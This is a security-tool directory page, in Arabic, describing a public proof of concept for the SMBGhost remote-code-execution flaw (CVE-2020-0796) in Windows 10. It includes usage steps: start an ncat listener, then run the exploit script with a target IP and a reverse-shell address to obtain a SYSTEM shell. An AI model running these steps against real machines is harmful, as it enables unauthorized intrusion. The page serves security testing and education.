Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2020-0796-RCE-POC — CVE-2020-0796 POC لتنفيذ التعليمات عن بُعد | Kitploit
أدوات/GitHubGitHub/jamf/cve-2020-0796-rce-poc
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالتعلم والتعليمأداة الوصول عن بعدArchived
GitHubjamf/cve-2020-0796-rce-poc

CVE-2020-0796-RCE-POC

CVE-2020-0796 POC لتنفيذ التعليمات عن بُعد

عرض المستودع
5731701منذ 6 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2020-0796 POC تنفيذ التعليمات البرمجية عن بُعد

(c) 2020 ZecOps, Inc. - https://www.zecops.com - العثور على أخطاء المهاجمين
POC لتنفيذ التعليمات البرمجية عن بُعد لـ CVE-2020-0796 / "SMBGhost"
النتيجة المتوقعة: شل عكسي مع وصول إلى النظام.
مخصص فقط للأغراض التعليمية والاختبار في بيئات الشركات.
ZecOps لا تتحمل أي مسؤولية عن الكود، استخدمه على مسؤوليتك الخاصة.
يرجى الاتصال بـ [email protected] إذا كنت مهتمًا بأدوات DFIR بدون وكيل للخوادم ونقاط النهاية والأجهزة المحمولة للكشف تلقائيًا عن SMBGhost وأنواع أخرى من الهجمات.

الاستخدام

  • تأكد من تثبيت Python و ncat.

  • قم بتشغيل calc_target_offsets.bat على الكمبيوتر الهدف، واضبط الإزاحات (offsets) في أعلى ملف SMBleedingGhost.py وفقًا لمخرجات البرنامج النصي (انظر أيضًا الملاحظة أدناه).

  • قم بتشغيل ncat باستخدام وسائط سطر الأوامر التالية:

    ncat -lvp <port>

    حيث <port> هو رقم المنفذ الذي سيستمع عليه ncat.

  • قم بتشغيل SMBleedingGhost.py باستخدام وسائط سطر الأوامر التالية:

    SMBleedingGhost.py <target_ip> <reverse_shell_ip> <reverse_shell_port>

    حيث <target_ip> هو عنوان IP للكمبيوتر الهدف الضعيف. <reverse_shell_ip> و <reverse_shell_port> هما عنوان IP ورقم المنفذ الذي يستمع عليه ncat.

  • إذا سارت الأمور على ما يرام، فسيعرض ncat شلًا يوفر وصولًا إلى النظام على الكمبيوتر الهدف.

ملاحظة: قد تتساءل لماذا من الضروري تشغيل البرنامج النصي calc_target_offsets.bat على الكمبيوتر الهدف، ألا يهزم ذلك الغرض الأساسي من كون تنفيذ التعليمات البرمجية عن بُعد هو 'عن بُعد'؟ هذه الإزاحات ليست عشوائية، وهي نفسها في جميع حالات Windows بنفس الإصدار. يمكن للمرء جعل الهجوم أكثر عمومية عن طريق اكتشاف إصدار Windows الهدف وضبط الإزاحات تلقائيًا، أو بعدم الاعتماد عليها تمامًا، لكنه مجرد POC وقد فعلنا ما هو أبسط. ونرى أيضًا أنه من الجيد أن POC ليس عالميًا، وغير مناسب للاستخدامات الأخرى غير الاختبار والتعليم.

demo

البيئة المستهدفة

الإصدارات 1903 و 1909 من Windows 10 متأثرة. الإصدارات غير المحدثة من Windows 10 1903 غير مدعومة بسبب خطأ إلغاء مرجع فارغ (null dereference) في Windows (تم إصلاحه في KB4512941).

بسبب طبيعة الاستغلال، يعمل POC بشكل أفضل للأهداف التي تعمل على كمبيوتر (أو VM) بمعالج منطقي واحد. الأهداف التي تحتوي على أكثر من معالج منطقي تعمل في VirtualBox يجب أن تكون مدعومة أيضًا، لكن POC يكون أقل موثوقية في هذه الحالة. قد لا تكون الأهداف الأخرى مدعومة. للتفاصيل، راجع مقالنا الفني أدناه.

المقال الفني

  • الجزء الأول من شرح SMBleedingGhost: ربط SMBleed (CVE-2020-1206) مع SMBGhost
  • الجزء الثاني من شرح SMBleedingGhost: قراءة الذاكرة غير المصادق عليها – تمهيد الطريق لـ RCE
  • الجزء الثالث من شرح SMBleedingGhost: من القراءة عن بُعد (SMBleed) إلى RCE

المراجع

  • إعادة إنتاج الثغرة: CVE-2020-0796 POC - مدونة ZecOps
  • CVE-2020-0796 - مركز استجابة الأمان من Microsoft
  • CVE-2020-1206 - مركز استجابة الأمان من Microsoft
تنزيل الأداة